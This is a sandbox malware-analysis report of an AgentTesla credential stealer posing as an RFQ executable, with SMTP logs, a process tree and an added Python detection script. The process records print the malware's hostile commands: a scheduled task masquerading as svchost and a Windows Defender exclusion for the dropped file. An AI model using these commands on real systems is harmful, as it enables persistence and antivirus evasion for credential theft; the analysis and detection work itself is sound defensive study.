May 8, 2024 09:21:23.526405096 CEST | 49758 | 587 | 192.168.2.4 | 185.230.214.164 | STARTTLS
May 8, 2024 09:21:23.848323107 CEST | 587 | 49758 | 185.230.214.164 | 192.168.2.4 | 220 Ready to start TLS.
May 8, 2024 09:21:26.937906981 CEST | 587 | 49762 | 185.230.214.164 | 192.168.2.4 | 220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:26 AM CEST
May 8, 2024 09:21:26.963848114 CEST | 49762 | 587 | 192.168.2.4 | 185.230.214.164 | EHLO 035347
May 8, 2024 09:21:27.285952091 CEST | 587 | 49762 | 185.230.214.164 | 192.168.2.4 | 250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
May 8, 2024 09:21:27.285965919 CEST | 587 | 49762 | 185.230.214.164 | 192.168.2.4 | 250-STARTTLS
    250 SIZE 53477376
May 8, 2024 09:21:27.291414022 CEST | 49762 | 587 | 192.168.2.4 | 185.230.214.164 | STARTTLS
May 8, 2024 09:21:27.612814903 CEST | 587 | 49762 | 185.230.214.164 | 192.168.2.4 | 220 Ready to start TLS.
May 8, 2024 09:21:31.749907970 CEST | 587 | 49765 | 185.230.214.164 | 192.168.2.4 | 220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:31 AM CEST
May 8, 2024 09:21:31.751312971 CEST | 49765 | 587 | 192.168.2.4 | 185.230.214.164 | EHLO 035347
May 8, 2024 09:21:32.073451996 CEST | 587 | 49765 | 185.230.214.164 | 192.168.2.4 | 250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
May 8, 2024 09:21:32.073466063 CEST | 587 | 49765 | 185.230.214.164 | 192.168.2.4 | 250-STARTTLS
May 8, 2024 09:21:32.073492050 CEST | 587 | 49765 | 185.230.214.164 | 192.168.2.4 | 250 SIZE 53477376
May 8, 2024 09:21:32.073697090 CEST | 49765 | 587 | 192.168.2.4 | 185.230.214.164 | STARTTLS
May 8, 2024 09:21:32.397638083 CEST | 587 | 49765 | 185.230.214.164 | 192.168.2.4 | 220 Ready to start TLS.


                                                                        Target ID:0
                                                                        Start time:09:20:50
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe"
                                                                        Imagebase:0x2091d7b0000
                                                                        File size:690'092 bytes
                                                                        MD5 hash:E184C8B191B12744E919B3B95CE39A0E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1664238561.000002091F69C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:09:20:50
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                                                                        Imagebase:0x7ff65faa0000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat""
                                                                        Imagebase:0x7ff65faa0000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                                                                        Imagebase:0x7ff76f990000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\timeout.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:timeout 3
                                                                        Imagebase:0x7ff7c3c90000
                                                                        File size:32'768 bytes
                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:8
                                                                        Start time:09:20:55
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                        Imagebase:0x800000
                                                                        File size:690'092 bytes
                                                                        MD5 hash:E184C8B191B12744E919B3B95CE39A0E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1993738956.000001A48033C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 37%, ReversingLabs
                                                                        • Detection: 36%, Virustotal, Browse
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:09:20:55
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:09:20:58
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                        Imagebase:0x216f6f20000
                                                                        File size:690'092 bytes
                                                                        MD5 hash:E184C8B191B12744E919B3B95CE39A0E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1920918632.000002168033C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:11
                                                                        Start time:09:20:58
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:12
                                                                        Start time:09:21:00
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:13
                                                                        Start time:09:21:01
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:14
                                                                        Start time:09:21:01
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                        Imagebase:0x180000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:15
                                                                        Start time:09:21:01
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                                        Imagebase:0x750000
                                                                        File size:42'064 bytes
                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2877570286.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2877570286.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        Target ID:16
                                                                        Start time:09:21:01
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                        Imagebase:0x7ff6eef20000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:17
                                                                        Start time:09:21:02
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:18
                                                                        Start time:09:21:02
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7792 -s 1152
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:19
                                                                        Start time:09:21:03
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:20
                                                                        Start time:09:21:03
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:21
                                                                        Start time:09:21:03
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                                        Imagebase:
                                                                        File size:42'064 bytes
                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:22
                                                                        Start time:09:21:03
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                        Imagebase:0x1f0000
                                                                        File size:47'584 bytes
                                                                        MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:23
                                                                        Start time:09:21:04
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                        Imagebase:
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:24
                                                                        Start time:09:21:04
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                        Imagebase:
                                                                        File size:108'664 bytes
                                                                        MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:25
                                                                        Start time:09:21:04
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                        Imagebase:0x400000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:26
                                                                        Start time:09:21:05
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                        Imagebase:0x5e0000
                                                                        File size:262'432 bytes
                                                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2879219152.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        Target ID:27
                                                                        Start time:09:21:05
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                        Imagebase:0x28ef0120000
                                                                        File size:690'092 bytes
                                                                        MD5 hash:E184C8B191B12744E919B3B95CE39A0E
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.1950991965.0000028E8033C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:true
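
The PowerShell command line at Target ID 19 (Add-MpPreference -ExclusionPath pointing into AppData\Roaming) and the svchost.exe copy executing from C:\Users\user\AppData\Roaming at Target ID 27 are the two behaviours a defender would want to alert on outside the sandbox, together with the argument-less .NET Framework hosts (InstallUtil, RegSvcs, CasPol, jsc, AddInProcess32, MSBuild) used as injection targets in this run. The following is an added example, not Joe Sandbox output or AgentTesla code: detection logic over constructed process-creation events (Sysmon Event ID 1 / Security 4688 style), reusing the command lines shown in this report plus a Base64-encoded variant of the exclusion command that is built inside the block. PIDs, the path lists and the heuristics are assumptions of the example.

```python
"""Triage checks for the process records above (added example, not Joe Sandbox output).

Input: process-creation events of the kind Sysmon EID 1 or Security 4688 produce.
The sample events are constructed; command lines are copied from this report,
the -EncodedCommand variant is generated here from the same plaintext.
"""
import base64
import re
from dataclasses import dataclass

# Image names Windows itself only starts from the system directories (assumed list).
SYSTEM_PROCESS_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "smss.exe",
                        "wininit.exe", "winlogon.exe", "services.exe", "dllhost.exe"}
TRUSTED_SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# .NET Framework utilities abused as injection/hollowing hosts in this report.
DOTNET_HOSTS = {"installutil.exe", "regsvcs.exe", "regasm.exe", "caspol.exe", "jsc.exe",
                "addinprocess32.exe", "addinprocess.exe", "msbuild.exe"}
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\users\\public\\", "\\programdata\\",
                         "\\temp\\", "\\downloads\\")


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str     # full path of the executable image
    cmdline: str   # command line exactly as logged


def image_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_cmdline(cmdline):
    """Windows-style tokenising: quoted runs stay together, quotes are stripped."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


_EXCLUSION_RE = re.compile(
    r"add-mppreference.*?-exclusion(?:path|process|extension)\s+\"?([^\"\s]+)", re.I)
# -e, -ec, -enc, -encodedcommand ... (approximates PowerShell's parameter prefix matching).
_ENCODED_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decoded_script(cmdline):
    """Plaintext of an -EncodedCommand payload (UTF-16LE Base64), or '' if none/undecodable."""
    m = _ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:   # binascii.Error is a ValueError subclass
        return ""


def check_defender_exclusion(ev):
    """Defender exclusion added from the command line, plain or Base64-encoded."""
    if image_name(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return None
    m = _EXCLUSION_RE.search(ev.cmdline + "\n" + decoded_script(ev.cmdline))
    if not m:
        return None
    target = m.group(1)
    where = "user-writable path" if any(k in target.lower() for k in USER_WRITABLE_MARKERS) else "path"
    return f"Defender exclusion added for {where}: {target}"


def check_masquerading_system_name(ev):
    """System process name executing outside System32/SysWOW64."""
    name = image_name(ev.image)
    if name in SYSTEM_PROCESS_NAMES and not ev.image.lower().startswith(TRUSTED_SYSTEM_DIRS):
        return f"system process name {name} running from {ev.image}"
    return None


def check_bare_dotnet_host(ev):
    """A .NET Framework utility started with no arguments has no legitimate work to do."""
    name = image_name(ev.image)
    if name in DOTNET_HOSTS and len(split_cmdline(ev.cmdline)) == 1:
        return f"{name} started with no arguments (typical injection/hollowing host)"
    return None


CHECKS = (check_defender_exclusion, check_masquerading_system_name, check_bare_dotnet_host)


def triage(events):
    """Return (pid, finding) pairs in event order."""
    findings = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit:
                findings.append((ev.pid, hit))
    return findings


# Constructed sample events; PIDs are arbitrary, command lines come from this report.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
MSBUILD = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"
PLAINTEXT_EXCLUSION_CMD = 'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming\\svchost.exe" -Force'
ENCODED = base64.b64encode(PLAINTEXT_EXCLUSION_CMD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcessEvent(1001, PS, f'"{PS}" {PLAINTEXT_EXCLUSION_CMD}'),
    ProcessEvent(1002, PS, f'"{PS}" -NoP -W Hidden -enc {ENCODED}'),
    ProcessEvent(1003, "C:\\Users\\user\\AppData\\Roaming\\svchost.exe",
                 '"C:\\Users\\user\\AppData\\Roaming\\svchost.exe"'),
    ProcessEvent(1004, "C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\system32\\svchost.exe -k netsvcs -p"),
    ProcessEvent(1005, MSBUILD, f'"{MSBUILD}"'),
    ProcessEvent(1006, MSBUILD, f'"{MSBUILD}" build.proj /t:Build'),
    ProcessEvent(1007, "C:\\Windows\\System32\\conhost.exe", "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for pid, finding in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: {finding}")
```

Run against the sample set, the three real-world noise cases (svchost.exe from System32 with its -k arguments, MSBuild with a project file, conhost) produce nothing, while both forms of the exclusion command, the AppData svchost copy and the bare msbuild.exe each produce one finding. The encoded-command branch matters because the same cmdlet is also seen Base64-wrapped in this run, which a plain string match on the command line would miss.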

                                                                        Target ID:28
                                                                        Start time:09:21:06
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                        Imagebase:0x30000
                                                                        File size:262'432 bytes
                                                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:29
                                                                        Start time:09:21:06
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:30
                                                                        Start time:09:21:06
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 508 -p 7872 -ip 7872
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:31
                                                                        Start time:09:21:07
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7872 -s 1104
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:34
                                                                        Start time:09:21:12
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:35
                                                                        Start time:09:21:12
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
